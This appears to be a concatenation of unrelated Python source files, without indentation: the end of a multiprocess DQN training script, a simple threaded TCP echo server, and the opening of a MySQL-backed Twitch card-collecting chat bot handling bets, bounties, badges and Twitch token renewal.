else: network_input = torch.empty((num_of_processes,2,read_length), device='cuda')
for proc in processes:
proc.start()
process_ended = 0
while process_ended!=num_of_processes:
# receive network input data (confirm that there are data, and copy them from the shared buffer to GPU)
num_of_data = 0
data_received_id = []
for i in range(num_of_processes):
if message_conn[i].poll():
idx=message_conn[i].recv()
if idx is not None:
data_received_id.append(idx) # the data sent through pipe is exactly the id
network_input[num_of_data]=worker_data[i]
num_of_data += 1
else: process_ended += 1
while message_conn[i].poll(): # for safety: drain any leftover messages
message_conn[i].recv()
# process the received data
if num_of_data == 0:
time.sleep(0.0005) # if no data, wait for 0.5 millisecond
if args.LQG: time.sleep(1.)
else:
action_values, avg_value, _noise = net(network_input[:num_of_data,:])
actions = action_values.max(1)[1].cpu()
for i,idx in enumerate(data_received_id):
message_conn[idx].send(actions[i].item())
# update the network
receive_net()
# end, if have left the while loop
if args.test or args.LQG:
with open(os.path.join(args.folder_name, others+'.txt'),'w') as f:
performances = np.array(performances)
f.write('{} +- {}\n'.format(np.mean(performances), np.std(performances, ddof=1)/np.sqrt(len(performances)) ))
for proc in processes:
proc.join()
if __name__ == '__main__':
class Main_System(object):
# the Main_System does not need to keep a copy of network
# only the copy of network inside TrainDQN class is modified by training, so we pass its state_dict to subprocesses
def __init__(self, train, num_of_processes, others=''):
self.train = train
self.processes = []
self.actor_update_time = 10.
self.lr_step = 0
self.pending_training_updates = Value('d',0.,lock=True)
# somehow RawValue also needs us to call ".value", otherwise it says the type is c_double or c_int
self.episode = RawValue('i',0)
self.t_done = Value('d',0.,lock=True)
self.last_achieved_time = RawValue('d',0.)
# set the data going to subprocesses:
self.train.memory.start_proxy_process((self.pending_training_updates, self.episode, self.t_done, self.last_achieved_time), self.train.transitions_storage, (self.train.batch_size, self.train.memory.tree.data_size))
# the following creates threads that do not end on their own and can cause errors on exit
spawn=mp.get_context('spawn')
self.manager = spawn.Manager()
self.MemoryInputQueue = self.manager.Queue()
self.end_event = self.manager.Event()
self.pause_event = self.manager.Event()
self.learning_in_progress_event = self.manager.Event()
# actors
self.ActorReceivePipe, self.ActorUpdatePipe = spawn.Pipe(False) # unidirectional pipe that send message from conn2 to conn1
seed = random.randrange(0,9999999)
self.worker_manager = spawn.Process( target=worker_manager, args=(copy.deepcopy(train.net).cpu(), (self.MemoryInputQueue, self.ActorReceivePipe, self.end_event, self.pause_event), num_of_processes, seed, others) )
# store and manage experience (including updating priority and potentially sampling out replays)
# all the arguments passed into it are used (**by fork initialization in RL module**).
# somehow RawValue also needs us to call ".value" ? Otherwise it says the type is c_double / c_int
self.train.memory.set_memory_source(self.MemoryInputQueue, (self.pause_event, self.end_event, self.learning_in_progress_event))
self.backup_period = self.train.backup_period
def __call__(self, num_of_episodes):
started = False
self.worker_manager.start()
last_time = time.time()
last_idle_time = 0.
updates_done = 0.
# We assume batch_size is 256 and each experience is learned 8 times in RL.py; when these settings change, the rescaling factor below compensates.
# If we disable training, we use 'inf' instead to make the condition of training always False.
downscaling_of_default_num_updates = (8./args.n_times_per_sample)*(args.batch_size/256.) if args.train else float('inf')
while self.episode.value < num_of_episodes or (self.episode.value < args.maximum_trails_before_giveup and not self.learning_in_progress_event.is_set()):
something_done = False # check whether nothing is done in one event loop
remaining_updates = self.pending_training_updates.value - updates_done
if remaining_updates >= 1. *downscaling_of_default_num_updates:
if remaining_updates >= 150. *downscaling_of_default_num_updates and not self.pause_event.is_set():
self.pause_event.set(); print('Wait for training')
loss = self.train()
# if we parallelize the training as a separate process, the following block should be deleted
if loss is not None:
updates_done += 1.*downscaling_of_default_num_updates
something_done = True # one training step is done
if not started: started = True
# to reduce the frequency of calling "get_lock()", we only periodically reset the shared data "pending_training_updates"
if updates_done >= 200.*downscaling_of_default_num_updates or self.pause_event.is_set():
with self.pending_training_updates.get_lock():
self.pending_training_updates.value -= updates_done
updates_done = 0.
if remaining_updates < 50. *downscaling_of_default_num_updates and self.pause_event.is_set():
self.pause_event.clear()
if self.t_done.value >= self.actor_update_time:
self.scale_up_actor_update_time(self.last_achieved_time.value)
if not self.ActorReceivePipe.poll() and started and not args.LQG:
self.ActorUpdatePipe.send(self.train.net.state_dict())
with self.t_done.get_lock():
self.t_done.value = 0.
something_done = True
if something_done:
# print out how much time the training process has been idle for
if last_idle_time != 0. and time.time() - last_time > 40.:
print('trainer pending for {:.1f} seconds out of {:.1f}'.format(last_idle_time, time.time() - last_time))
last_idle_time = 0.
last_time = time.time()
# if nothing is done, wait.
if not something_done: time.sleep(0.01); last_idle_time += 0.01
self.adjust_learning_rate()
self.end_event.set()
self.worker_manager.join()
return
def scale_up_actor_update_time(self, achieved_time):
changed = False
if achieved_time>80. and self.actor_update_time<=150.:
self.actor_update_time = 1000.; changed = True
elif achieved_time>20. and self.actor_update_time<=50.:
self.actor_update_time = 150.; changed = True
elif achieved_time>10. and self.actor_update_time<=25.:
self.actor_update_time = 50.; changed = True
elif achieved_time>5. and self.actor_update_time<=10.:
self.actor_update_time = 25.; changed = True
if changed and args.train: print('actor_update_time adjusted to {:.1f}'.format(self.actor_update_time))
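# Example: if the actors last achieved 22 time units and actor_update_time is
# currently 50 or less, it is bumped to 150; the ladder only ever scales upwards.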
def adjust_learning_rate(self):
# the learning rate schedule is written in "arguments.py"
if self.episode.value > args.lr_schedule[self.lr_step][0] and self.last_achieved_time.value == t_max:
args.lr = min(args.lr_schedule[self.lr_step][1], args.lr)
self.lr_step += 1
if args.train:
for param_group in self.train.optim.param_groups: param_group['lr'] = args.lr
print(colored('learning rate set to {:.2g}'.format(args.lr),attrs=['bold']))
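# Example (assumed schedule format): with args.lr_schedule = [(1000, 1e-4), (3000, 3e-5)],
# once episode > 1000 and the last episode reached t_max, args.lr is lowered to
# min(1e-4, args.lr) and lr_step advances to the next entry.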
# system settings, checks and the framework
def check_C_module_and_compile():
if not args.compile:
try:
simulation = __import__('simulation')
(compiled_n_max, compiled_omega) = simulation.check_settings()
if compiled_n_max != n_max:
print(colored('N_MAX of the existing C module ({}) does not match the current task ({}). Recompile.\n'.format(compiled_n_max, n_max), 'yellow',attrs=['bold']))
time.sleep(1)
args.compile = True
elif compiled_omega != omega:
print(colored('omega of the existing C module ({}) does not match the current task ({}). Recompile.\n'.format(compiled_omega, omega), 'yellow', attrs=['bold']))
time.sleep(1)
args.compile = True
except (ModuleNotFoundError, AttributeError) as e:
args.compile = True
if args.compile:
# use sys.version_info so the version string stays correct on Python >= 3.10 (sys.version[:3] would give '3.1')
code = os.system('python{}.{} setupC.py --n_max {} --omega {} --gamma {}'.format(sys.version_info.major, sys.version_info.minor, n_max, omega, gamma))
if code != 0:
raise RuntimeError('Compilation Failure')
if __name__ == '__main__':
time_of_start = time.time()
# set the title of the terminal so that what the terminal is doing is clear
print('\33]0;{}\a'.format(' '.join(sys.argv)), end='', flush=True)
print(args)
# compile the simulation module in C
check_C_module_and_compile()
# set the replay memory
capacity = round(args.size_of_replay_memory*controls_per_half_period*t_max) if args.train else 1
memory = RL.Memory(capacity = capacity, data_size = data_size * 2 + 2 if args.input != 'measurements' else \
(read_control_step_length+read_length) + read_length//read_control_step_length+1 + 2,
policy = 'random', passes_before_random = 0.2)
# define the neural network
net = RL.direct_DQN(data_size).cuda() if args.input != 'measurements' else RL.DQN_measurement(read_length)
# set the task
if args.train or args.LQG:
train = RL.TrainDQN(net, memory, batch_size = args.batch_size, gamma=0.99, backup_period = args.target_network_update_interval, args=args)
del net
# the main function of training
if args.train:
main = Main_System(train, num_of_processes=args.num_of_actors)
main(num_of_episodes)
# when we do not train and we test the result of LQG
elif args.LQG:
main = Main_System(train, num_of_processes=args.num_of_actors, others='LQG')
main(args.num_of_test_episodes)
# if we test existing models, we use a loop to iterate over the models
else:
# find all models to test that end with no extension or '.pth' in the given directory
import glob
test_nets = []
for name in glob.glob(os.path.join(args.folder_name,'*')):
file_name, ext = os.path.splitext(os.path.basename(name))
if (ext=='.pth' or ext=='') and os.path.isfile(name): test_nets.append((file_name, torch.load(name)))
assert len(test_nets)!=0, 'No model found to test'
from utilities import isfloat, isint
test_nets = sorted([t for t in test_nets if isfloat(t[0])], key = lambda t: float(t[0])) + sorted([t for t in test_nets if not isfloat(t[0])])
# for each model we run the main loop once
for test_net in test_nets:
if test_net[1].__class__ == RL.direct_DQN: net.load_state_dict(test_net[1].state_dict())
else: net.load_state_dict(test_net[1])
train = RL.TrainDQN(net, memory, batch_size = args.batch_size, gamma=0.99, backup_period = args.target_network_update_interval, args=args)
main = Main_System(train, num_of_processes=args.num_of_actors, others=test_net[0])
main(args.num_of_test_episodes)
del net
# organize all test results into one file
with open(os.path.join(args.folder_name,'test_result.txt'),'w') as test_result:
for test_net in test_nets:
with open(os.path.join(args.folder_name,test_net[0]+'.txt')) as f:
result = f.readline()
test_result.write('{}:\t'.format(test_net[0])+result)
print('{}:\t'.format(test_net[0])+result, end='')
os.remove(os.path.join(args.folder_name,test_net[0]+'.txt'))
del main
del memory
from timer import print_elapsed_time
print_elapsed_time(time_of_start)
|
tcp_server.py | import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print(f"[*] Listening on {bind_ip}, {bind_port}")
#client handling thread
def handle_client(client_socket):
"""Print out what the clients send
"""
request = client_socket.recv(1024)
print(f"[*] Received {request}")
#send back a packet
client_socket.send(b"ACK!")
print(client_socket.getpeername())
client_socket.close()
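# Example client for manual testing (hypothetical, run in a separate shell):
# import socket
# c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# c.connect(("127.0.0.1", 9999))
# c.send(b"hello")
# print(c.recv(4096)) # expects the ACK reply from the server
# c.close()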
while True:
client, addr = server.accept()
print(f"[*] Accepted connection from {addr[0]}, {addr[1]} ")
#spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start() |
main.py | #!/usr/bin/python3
# coding=utf-8
import pymysql
import pydle
import random
from random import choice
import datetime
import time
from threading import Timer, Thread
import urllib.request
import requests
import json
import threading
import math
import functools
from string import ascii_letters
from collections import defaultdict, OrderedDict
from private_functions import validateWaifuURL, processWaifuURL, validateBadgeURL, processBadgeURL, tokenGachaRoll
import sys
import re
import logging
import logging.handlers
import base64
import websocket
import _thread as thread
formatter = logging.Formatter('[%(asctime)s][%(name)s][%(levelname)s] %(message)s')
logger = logging.getLogger('nepbot')
logger.setLevel(logging.DEBUG)
logger.propagate = False
fh = logging.handlers.TimedRotatingFileHandler('debug.log', when='midnight', encoding='utf-8')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
logging.getLogger('tornado.application').addHandler(fh)
logging.getLogger('tornado.application').addHandler(ch)
ffzws = 'wss://andknuckles.frankerfacez.com'
pool = pydle.ClientPool()
current_milli_time = lambda: int(round(time.time() * 1000))
pymysql.install_as_MySQLdb()
dbpw = None
dbname = None
dbhost = None
dbuser = None
silence = False
debugMode = False
streamlabsclient = None
twitchclientsecret = None
bannedWords = []
t = None
# read config values from file (db login etc)
try:
f = open("nepbot.cfg", "r")
lines = f.readlines()
for line in lines:
name, value = line.split("=", 1)
value = str(value).strip("\n")
logger.info("Reading config value '%s' = '<redacted>'", name)
if name == "dbpassword":
dbpw = value
if name == "database":
dbname = value
if name == "dbhost":
dbhost = value
if name == "dbuser":
dbuser = value
if name == "streamlabsclient":
streamlabsclient = value
if name == "twitchclientsecret":
twitchclientsecret = value
if name == "log":
logger.info("Setting new console log level to %s", value)
ch.setLevel(logging.getLevelName(value))
if name == "silent" and value == "True":
logger.warning("Silent mode enabled")
silence = True
if name == "debugMode" and value == "True":
logger.warning("Debug mode enabled, !as command is available")
debugMode = True
if name == "bannedWords":
bannedWords = [word.lower() for word in value.split(",")]
if dbpw is None:
logger.error("Database password not set. Please add it to the config file, with 'dbpassword=<pw>'")
sys.exit(1)
if dbname is None:
logger.error("Database name not set. Please add it to the config file, with 'database=<name>'")
sys.exit(1)
if dbhost is None:
logger.error("Database host not set. Please add it to the config file, with 'dbhost=<host>'")
sys.exit(1)
if dbuser is None:
logger.error("Database user not set. Please add it to the config file, with 'dbuser=<user>'")
sys.exit(1)
if twitchclientsecret is None:
logger.error("Twitch Client Secret not set. Please add it to the conig file, with 'twitchclientsecret=<pw>'")
sys.exit(1)
f.close()
except Exception:
logger.error("Error reading config file (nepbot.cfg), aborting.")
sys.exit(1)
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit=True, charset="utf8mb4")
admins = []
superadmins = []
activitymap = {}
marathonActivityMap = {}
blacklist = []
config = {}
packAmountRewards = {}
emotewaremotes = []
revrarity = {}
visiblepacks = ""
validalertconfigvalues = []
discordhooks = []
cpuVoters = []
busyLock = threading.Lock()
discordLock = threading.Lock()
streamlabsLock = threading.Lock()
streamlabsauthurl = "https://www.streamlabs.com/api/v1.0/authorize?client_id=" + streamlabsclient + "&redirect_uri=https://marenthyu.de/cgi-bin/waifucallback.cgi&response_type=code&scope=alerts.create&state="
streamlabsalerturl = "https://streamlabs.com/api/v1.0/alerts"
alertheaders = {"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
time_regex = re.compile(r'(?P<hours>[0-9]*):(?P<minutes>[0-9]{2}):(?P<seconds>[0-9]{2})([\.:](?P<ms>[0-9]{1,3}))?')
waifu_regex = None
def loadConfig():
global revrarity, blacklist, visiblepacks, admins, superadmins, validalertconfigvalues, waifu_regex, emotewaremotes, discordhooks, packAmountRewards
with db.cursor() as curg:
curg.execute("SELECT * FROM config")
logger.info("Importing config from database")
for row in curg.fetchall():
config[row[0]] = row[1]
logger.debug("Config: %s", str(config))
if int(config["emoteWarStatus"]) == 1:
# emote war active, get its emotes
curg.execute("SELECT name FROM emoteWar")
emotewaremotes = [row[0] for row in curg.fetchall()]
else:
emotewaremotes = []
alertRarityRange = range(int(config["drawAlertMinimumRarity"]), int(config["numNormalRarities"]))
validalertconfigvalues = ["color", "alertChannel", "defaultLength", "defaultSound", "setClaimSound",
"setClaimLength"] \
+ ["rarity%dLength" % rarity for rarity in alertRarityRange] \
+ ["rarity%dSound" % rarity for rarity in alertRarityRange]
waifu_regex = re.compile(r'(\[(?P<id>[0-9]+?)])?(?P<name>.+?) *- *(?P<series>.+) *- *(?P<rarity>[0-' + str(
int(config["numNormalRarities"]) + int(config["numSpecialRarities"]) - 1) + r']) *- *(?P<link>.+?)$')
logger.debug("Alert config values: %s", str(validalertconfigvalues))
logger.debug("Waifu regex: %s", str(waifu_regex))
logger.info("Fetching admin list...")
curg.execute("SELECT name, super FROM admins")
admins = []
superadmins = []
for row in curg.fetchall():
admins.append(row[0])
if row[1] != 0:
superadmins.append(row[0])
logger.debug("Admins: %s", str(admins))
logger.debug("SuperAdmins: %s", str(superadmins))
revrarity = {config["rarity" + str(i) + "Name"]: i for i in
range(int(config["numNormalRarities"]) + int(config["numSpecialRarities"]))}
curg.execute("SELECT id FROM banned_users WHERE banned = 1")
blacklist = [int(row[0]) for row in curg.fetchall()]
# visible packs
curg.execute("SELECT name FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
packrows = curg.fetchall()
visiblepacks = "/".join(row[0] for row in packrows)
# discord hooks
with discordLock:
curg.execute("SELECT url FROM discordHooks ORDER BY priority DESC")
discrows = curg.fetchall()
discordhooks = [row[0] for row in discrows]
# pack amount rewards
packAmountRewards = {}
curg.execute("SELECT boostername, de_amount, reward_booster FROM pack_amount_rewards")
rewardRows = curg.fetchall()
for row in rewardRows:
if row[0] not in packAmountRewards:
packAmountRewards[row[0]] = {}
packAmountRewards[row[0]][int(row[1])] = row[2]
def checkAndRenewAppAccessToken():
global config, headers
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"], "Accept": "application/vnd.twitchtv.v5+json"}
r = requests.get("https://api.twitch.tv/kraken", headers=krakenHeaders)
resp = r.json()
if "token" not in resp or "valid" not in resp["token"] or not resp["token"]["valid"]:
# app access token has expired, get a new one
logger.debug("Requesting new token")
url = 'https://id.twitch.tv/oauth2/token?client_id=%s&client_secret=%s&grant_type=client_credentials' % (
config["clientID"], twitchclientsecret)
r = requests.post(url)
try:
jsondata = r.json()
if 'access_token' not in jsondata or 'expires_in' not in jsondata:
raise ValueError("Invalid Twitch API response, can't get an app access token.")
config["appAccessToken"] = jsondata['access_token']
logger.debug("request done")
cur = db.cursor()
cur.execute("UPDATE config SET value = %s WHERE name = 'appAccessToken'", [jsondata['access_token']])
cur.close()
headers = {"Authorization": "Bearer %s" % config["appAccessToken"], "Client-ID": config["clientID"]}
except ValueError as error:
logger.error("Access Token renew/get request was not successful")
raise error
def booleanConfig(name):
return name in config and config[name].strip().lower() not in ["off", "no", "false"]
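# Examples: booleanConfig("memeMode") is False when the key is missing or its stored
# value is "off", "no" or "false" (case-insensitive, surrounding whitespace ignored);
# any other stored value, e.g. "on" or "1", counts as True.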
def placeBet(channel, userid, betms):
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return False
cur.execute("REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[row[0], userid, betms, current_milli_time()])
cur.close()
return True
def endBet(channel):
# find started bet data
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'started' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return None
# mark the bet as closed
endTime = current_milli_time()
cur.execute("UPDATE bets SET status = 'completed', endTime = %s WHERE id = %s", [endTime, row[0]])
# calculate preliminary results
cur.close()
return getBetResults(row[0])
def getBetResults(betid):
# get bet data
cur = db.cursor()
cur.execute("SELECT status, startTime, endTime FROM bets WHERE id = %s", [betid])
betrow = cur.fetchone()
if betrow is None:
cur.close()
return None
if betrow[0] != 'completed' and betrow[0] != 'paid':
cur.close()
return None
timeresult = betrow[2] - betrow[1]
cur.execute(
"SELECT bet, userid, users.name FROM placed_bets INNER JOIN users ON placed_bets.userid = users.id WHERE betid = %s ORDER BY updated ASC",
[betid])
rows = cur.fetchall()
placements = sorted(rows, key=lambda row: abs(int(row[0]) - timeresult))
actualwinners = [{"id": row[1], "name": row[2], "bet": row[0], "timedelta": row[0] - timeresult} for row in
placements]
cur.close()
return {"result": timeresult, "winners": actualwinners}
class NotEnoughBetsException(Exception):
pass
class NoBetException(Exception):
pass
class NotOpenLongEnoughException(Exception):
pass
def startBet(channel, confirmed=False):
with db.cursor() as cur:
cur.execute("SELECT id, openedTime FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is not None:
if not confirmed:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [row[0]])
if cur.fetchone()[0] < int(config["betMinimumEntriesForPayout"]):
raise NotEnoughBetsException()
if row[1] is not None and int(row[1]) + int(config["betMinimumMinutesOpen"])*60000 > current_milli_time():
raise NotOpenLongEnoughException()
cur.execute("UPDATE bets SET startTime = %s, status = 'started' WHERE id = %s", [current_milli_time(), row[0]])
else:
raise NoBetException()
def openBet(channel):
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM bets WHERE channel = %s AND status IN('open', 'started')", [channel])
result = cur.fetchone()[0] or 0
if result > 0:
cur.close()
return False
else:
cur.execute("INSERT INTO bets(channel, status, openedTime) VALUES (%s, 'open', %s)", [channel, current_milli_time()])
cur.close()
return True
def cancelBet(channel):
cur = db.cursor()
affected = cur.execute("UPDATE bets SET status = 'cancelled' WHERE channel = %s AND status IN('open', 'started')",
[channel])
cur.close()
return affected > 0
def getHand(twitchid):
try:
tID = int(twitchid)
except Exception:
logger.error("Got non-integer id for getHand. Aborting.")
return []
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT cards.id AS cardid, waifus.name, waifus.id AS waifuid, cards.rarity, waifus.series, COALESCE(cards.customImage, waifus.image) AS image, waifus.base_rarity, cards.tradeableAt FROM cards JOIN waifus ON cards.waifuid = waifus.id WHERE cards.userid = %s AND cards.boosterid IS NULL ORDER BY COALESCE(cards.sortValue, 32000) ASC, (rarity < %s) DESC, waifus.id ASC, cards.id ASC",
[tID, int(config["numNormalRarities"])])
return cur.fetchall()
def getOpenBooster(twitchid):
try:
tID = int(twitchid)
except Exception:
logger.error("Got non-integer id for getBooster. Aborting.")
return []
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT id, boostername, paid FROM boosters_opened WHERE userid = %s AND status = 'open' LIMIT 1", [tID])
booster = cur.fetchone()
if booster is None:
return None
cur.execute("SELECT cards.id AS cardid, waifus.name, waifus.id AS waifuid, cards.rarity, waifus.series, COALESCE(cards.customImage, waifus.image) AS image, waifus.base_rarity FROM cards JOIN waifus ON cards.waifuid = waifus.id WHERE cards.userid = %s AND cards.boosterid = %s ORDER BY waifus.id ASC", [tID, booster['id']])
booster['cards'] = cur.fetchall()
return booster
def getCard(cardID):
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT cards.*, waifus.base_rarity, waifus.image FROM cards JOIN waifus ON cards.waifuid=waifus.id WHERE cards.id = %s", [cardID])
return cur.fetchone()
def addCard(userid, waifuid, source, boosterid=None, rarity=None):
with db.cursor() as cur:
if rarity is None:
cur.execute("SELECT base_rarity FROM waifus WHERE id = %s", [waifuid])
rarity = cur.fetchone()[0]
waifuInfo = [userid, boosterid, waifuid, rarity, current_milli_time(), userid, boosterid, source]
cur.execute("INSERT INTO cards (userid, boosterid, waifuid, rarity, created, originalOwner, originalBooster, source) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)", waifuInfo)
return cur.lastrowid
def updateCard(id, changes):
changes["updated"] = current_milli_time()
with db.cursor() as cur:
cur.execute('UPDATE cards SET {} WHERE id = %s'.format(', '.join('{}=%s'.format(k) for k in changes)), list(changes.values()) + [id])
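# Example: updateCard(42, {"userid": None}) also stamps "updated" and issues
# UPDATE cards SET userid=%s, updated=%s WHERE id = %s with [None, <now_ms>, 42].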
def search(query, series=None):
cur = db.cursor()
if series is None:
cur.execute("SELECT id, name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND name LIKE %s",
["%" + query + "%"])
else:
cur.execute(
"SELECT id, name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND name LIKE %s AND series LIKE %s",
["%" + query + "%", "%" + series + "%"])
rows = cur.fetchall()
ret = []
for row in rows:
ret.append({'id': row[0], 'name': row[1], 'series': row[2], 'base_rarity': row[3]})
return ret
def handLimit(userid):
with db.cursor() as cur:
cur.execute("SELECT 7 + paidHandUpgrades + freeUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
return limit
def paidHandUpgrades(userid):
cur = db.cursor()
cur.execute("SELECT paidHandUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
cur.close()
return limit
def currentCards(userid, verbose=False):
cur = db.cursor()
cur.execute(
"SELECT (SELECT COUNT(*) FROM cards WHERE userid = %s AND boosterid IS NULL AND rarity < %s), (SELECT COUNT(*) FROM bounties WHERE userid = %s AND status = 'open')",
[userid, int(config["numNormalRarities"]), userid])
result = cur.fetchone()
cur.close()
if verbose:
return {"hand": result[0], "bounties": result[1], "total": result[0] + result[1]}
else:
return result[0] + result[1]
def upgradeHand(userid, gifted=False):
cur = db.cursor()
cur.execute(
"UPDATE users SET paidHandUpgrades = paidHandUpgrades + %s, freeUpgrades = freeUpgrades + %s WHERE id = %s",
[0 if gifted else 1, 1 if gifted else 0, userid])
cur.close()
def disenchant(bot, cardid):
# return amount of points gained
with db.cursor() as cur:
card = getCard(cardid)
deValue = int(config["rarity" + str(card["rarity"]) + "Value"])
updateCard(cardid, {"userid": None, "boosterid": None})
# bounty to fill?
cur.execute(
"SELECT bounties.id, bounties.userid, users.name, bounties.amount, waifus.name, waifus.base_rarity, waifus.image FROM bounties JOIN users ON bounties.userid = users.id JOIN waifus ON bounties.waifuid = waifus.id WHERE bounties.waifuid = %s AND bounties.status = 'open' ORDER BY bounties.amount DESC LIMIT 1",
[card["waifuid"]])
order = cur.fetchone()
if order is not None:
# fill their order instead of actually disenchanting
filledCardID = addCard(order[1], card['waifuid'], "bounty")
# when we spawn a bounty card, carry over the old original owner id
updateCard(filledCardID, {"originalOwner": card['originalOwner']})
bot.message('#%s' % order[2],
"Your bounty for [%d] %s for %d points has been filled and they have been added to your hand." % (
card['waifuid'], order[4], order[3]), True)
cur.execute("UPDATE bounties SET status = 'filled', oldCard = %s, newCard = %s, updated = %s WHERE id = %s",
[cardid, filledCardID, current_milli_time(), order[0]])
sendPushNotification([order[1]], {'type': 'bountyFilled',
'image': card['customImage'] if card['customImage'] else order[6],
'message': "Your bounty for [%d] %s for %d points has been filled and they have been added to your hand." % (
card['waifuid'], order[4], order[3]),
'openurl': config['siteHost'] + '/hand?user=' + order[2]})
# alert people with lower bounties but above the cap?
base_value = int(config["rarity" + str(order[5]) + "Value"])
min_bounty = int(config["rarity" + str(order[5]) + "MinBounty"])
rarity_cap = int(config["rarity" + str(order[5]) + "MaxBounty"])
cur.execute(
"SELECT users.name, users.id FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open' AND bounties.amount > %s",
[card['waifuid'], rarity_cap])
otherUsers = []
for userrow in cur.fetchall():
bot.message('#%s' % userrow[0],
"A higher bounty for [%d] %s than yours was filled, so you can now cancel yours and get full points back provided you don't change it." % (
card['waifuid'], order[4]), True)
otherUsers.append(userrow[1])
if otherUsers:
sendPushNotification(otherUsers, {'type': 'bountyHigherFilled',
'image': card['customImage'] if card['customImage'] else order[6],
'message': "A higher bounty for [%d] %s than yours was filled, so you can now cancel yours and get full points back provided you don't change it." % (
card['waifuid'], order[4]),
'openurl': 'https://twitch.tv/nepnepbot'})
# give the disenchanter appropriate profit
# everything up to the min bounty, 1/2 of any amount between the min and max bounties, 1/4 of anything above the max bounty.
deValue += (min_bounty - base_value) + max(min(order[3] - min_bounty, rarity_cap - min_bounty) // 2, 0) + max((order[3] - rarity_cap) // 4, 0)
return deValue
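# Worked example (hypothetical numbers): with base_value=100, min_bounty=200,
# rarity_cap=600 and a filled bounty of order[3]=1000 points, the disenchanter gains,
# on top of the rarity's deValue, (200-100) + min(800, 400)//2 + (1000-600)//4
# = 100 + 200 + 100 = 400 extra points.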
def sendPushNotification(ids, data):
pushHeaders = {'Authorization': 'Basic ' + base64.b64encode(bytes('internal:' + config['adminPass'], 'utf-8')).decode('utf-8')}
r = requests.post(config['siteHost'] + '/sendpush', headers=pushHeaders, json={'ids': ids, 'data': data})
try:
res = r.json()
except Exception:
logger.warning('Error during request decoding')
logger.warning(str(r.status_code))
logger.warning(r.text)
def setFavourite(userid, waifu):
with db.cursor() as cur:
cur.execute("UPDATE users SET favourite=%s WHERE id = %s", [waifu, userid])
def setDescription(userid, newDesc):
with db.cursor() as cur:
cur.execute("UPDATE users SET profileDescription=%s WHERE id = %s", [newDesc, userid])
def checkFavouriteValidity(userid):
with db.cursor() as cur:
cur.execute("SELECT favourite FROM users WHERE id = %s", [userid])
favourite = getWaifuById(cur.fetchone()[0])
valid = True
if favourite["can_favourite"] == 0:
valid = False
elif favourite["base_rarity"] >= int(config["numNormalRarities"]):
# must be owned
cur.execute("SELECT COUNT(*) FROM cards WHERE waifuid = %s AND boosterid IS NULL AND userid = %s", [favourite["id"], userid])
valid = cur.fetchone()[0] > 0
if not valid:
# reset favourite
cur.execute("UPDATE users SET favourite = 1 WHERE id = %s", [userid])
def getBadgeByID(id):
logger.debug("Getting badge for id %s", id)
try:
id = int(id)
if id < 1 or id > maxBadgeID():
logger.debug("ID was smaller than 1 or bigger than max.")
return None
except ValueError:
logger.debug("ValueError, not an int")
return None
cur = db.cursor()
cur.execute("SELECT id, name, description, image FROM badges WHERE id=%s",
[id])
row = cur.fetchone()
ret = {"id": row[0], "name": row[1], "image": row[3], "description": row[2]}
cur.close()
logger.debug("Fetched Badge from id: %s", ret)
return ret
def addBadge(name, description, image):
"""Adds a new Badge to the database"""
with db.cursor() as cur:
cur.execute("INSERT INTO badges(name, description, image) VALUES(%s, %s, %s)", [name, description, image])
return cur.lastrowid
def giveBadge(userid, badge):
"""Gives a user a badge"""
badgeObj = getBadgeByID(badge)
if badgeObj is None:
return False
else:
try:
with db.cursor() as cur:
cur.execute("INSERT INTO has_badges(userID, badgeID) VALUES(%s, %s)", [userid, badge])
except Exception:
logger.debug("Had an error.", exc_info=True)
return False
return True
def getHoraro():
r = requests.get(
"https://horaro.org/-/api/v1/schedules/{horaroid}/ticker".format(horaroid=config["horaroID"]))
try:
j = r.json()
# ("got horaro ticker: " + str(j))
return j
except Exception:
logger.error("Horaro Error:")
logger.error(str(r.status_code))
logger.error(r.text)
def getRawRunner(runner):
if '[' not in runner:
return runner
return runner[runner.index('[') + 1 : runner.index(']')]
def updateBoth(game, title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title), "game": str(game)}}
logger.debug(str(body))
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
logger.debug("Response from twitch: "+str(j))
# print("tried to update channel title, response: " + str(j))
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateTitle(title):
